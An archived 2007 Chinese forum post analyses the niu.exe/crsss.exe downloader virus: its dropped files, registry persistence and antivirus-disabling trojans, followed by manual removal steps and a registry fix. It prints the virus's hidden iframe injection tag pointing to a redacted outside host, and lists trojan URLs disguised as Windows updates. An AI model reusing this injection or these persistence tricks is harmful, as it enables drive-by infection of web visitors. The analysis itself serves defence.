IT家园's Archiver

西布伦 发表于 2007-7-21 14:35

niu.exe,crsss.exe感染型下载者病毒的分析解决

[table=98%][tr][td]
[size=14px][color=#000000]病毒运行后:
文件变化:
释放文件C:\WINDOWS\system32\crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化[/color]
[color=#000000]遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=http://www.xxxxxx.cn/htm/htm.htm width=0 height=0></IfrAmE>
遍历所有分区 删除*.gho文件
删除C:\WINDOWS\system32\verclsid.exe[/color]
[color=#000000]注册表变化
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下添加<crsss><C:\WINDOWS\system32\crsss.exe>    [] 达到开机启动的目的
修改HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加
DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能[/color]
[color=#000000]如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page为 [url]www.hao123.com[/url]
并且修改HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001
使得IE主页修改按钮失效[/color]
[color=#000000]如果连接网络则为如下变化
下载[url]http://www.xxxxxx.cn/htm/IEURL.txt[/url]到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址[/color]
[color=#000000]下载[url]http://www.xxxxxx.cn/htm/exe.txt[/url]到系统文件夹 读取里面的内容
下载木马
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB138308-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB238104-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB284302-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB468603-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB878206-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB423807-x86-CHS.exe[/url]
[url]http://www.xxxxxx.cn/xp/WindowsXP-KB138309-x86-CHS.exe[/url]
到系统文件夹 分别命名为0temp.exe~13temp.exe[/color]
[color=#000000]木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等    而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启
[/color]
[color=#000000][img]http://www.wzlu.com/article/UploadPic/2007-7/2007721122246967.jpg[/img][/color]

[color=#000000]具体原理不懂 希望高手指教[/color]
[color=#000000]木马植入完毕后 生成文件如下
C:\WINDOWS\system32\10temp.DAT
C:\WINDOWS\system32\7temp.DAT
C:\WINDOWS\system32\Autorun.inf
C:\WINDOWS\system32\c.txt
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\d.txt
C:\WINDOWS\system32\dhbini.dll
C:\WINDOWS\system32\dhbpri.dll
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\test1.txt
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\ztgini.dll
C:\WINDOWS\system32\ztgpri.dll
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%\tlso.exe
%temp%\zxzo0.dll
%temp%\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys[/color]
[color=#000000]sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe>    []
      <WinForm><C:\WINDOWS\WinForm.exe>    []
      <tlsa><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe>    []
      <TIMHost><C:\WINDOWS\TIMHost.exe>    []
      <KVP><C:\WINDOWS\system32\drivers\svchost.exe>    []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
      <AppInit_DLLs><dhbpri.dll>    []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
      <{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys>    []
      <{22311A42-AC1B-158F-FD32-5674345F23A2}><C:\WINDOWS\system32\dhbpri.dll>    []
      <{71351752-5628-1547-FFAB-BADC13512AF7}><C:\WINDOWS\system32\ztgpri.dll>    []
服务
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
    <C:\WINDOWS\system32\rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>[/color]
[color=#000000][b]解决方法:
[/b]
1.首先把系统时间改回来

2.修改 C:\WINDOWS\system32\dhbpri.dll和C:\WINDOWS\system32\ztgpri.dll文件名为其他名称
[/color]
[color=#000000]3.重启计算机进入安全模式(开机后不断 按F8键    然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng

启动项目    注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<crsss><C:\WINDOWS\system32\crsss.exe>    []
      <WinForm><C:\WINDOWS\WinForm.exe>    []
      <tlsa><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tlso.exe>    []
      <TIMHost><C:\WINDOWS\TIMHost.exe>    []
      <KVP><C:\WINDOWS\system32\drivers\svchost.exe>    []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
      <{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys>    []
    <{22311A42-AC1B-158F-FD32-5674345F23A2}><C:\WINDOWS\system32\dhbpri.dll>    []
      <{71351752-5628-1547-FFAB-BADC13512AF7}><C:\WINDOWS\system32\ztgpri.dll>    []

双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service / RemoteDbg[/color]
[color=#000000]系统修复-Windows shell/IE 选中
设置主页为"about:blank"和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复 [/color]

[color=#000000]把下面的代码拷入记事本中然后另存为1.reg文件
[/color][table=500,#ffffff][tr][td][color=#000000] Windows Registry Editor Version 5.00[/color] [color=#000000][HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"[/color]
[/td][/tr][/table]
[color=#000000]双击1.reg把这个注册表项导入[/color]
[color=#000000]双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击    菜单栏下方的 文件夹按钮(搜索右边的按钮)
从左边的资源管理器 进入C盘
删除如下文件(如遇提示无法删除文件,到down.45it.com下载费尔木马强制删除器工具进行强制删除)
C:\WINDOWS\system32\10temp.DAT
C:\WINDOWS\system32\7temp.DAT
C:\WINDOWS\system32\Autorun.inf
C:\WINDOWS\system32\c.txt
C:\WINDOWS\system32\drivers\svchost.exe
C:\WINDOWS\system32\d.txt
C:\WINDOWS\system32\dhbini.dll
C:\WINDOWS\system32\dhbpri.dll改完名称的文件
C:\WINDOWS\system32\nwizqjsj.exe
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\test1.txt
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\WinForm.dll
C:\WINDOWS\system32\ztgini.dll
C:\WINDOWS\system32\ztgpri.dll改完名称的文件
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\WinForm.exe
%temp%\tlso.exe
%temp%\zxzo0.dll
%temp%\tlso0.dll
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
C:\WINDOWS\system32\crsss.exe
C:\autorun.inf
C:\niu.exe
从左边的资源管理器 进入其他分区 删除autorun.inf和niu.exe[/color]
[color=#000000]下载iframekill.rar,使用该工具清理被感染的htm等文件[/color]
[/size][/font]
[/td][/tr][/table]

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.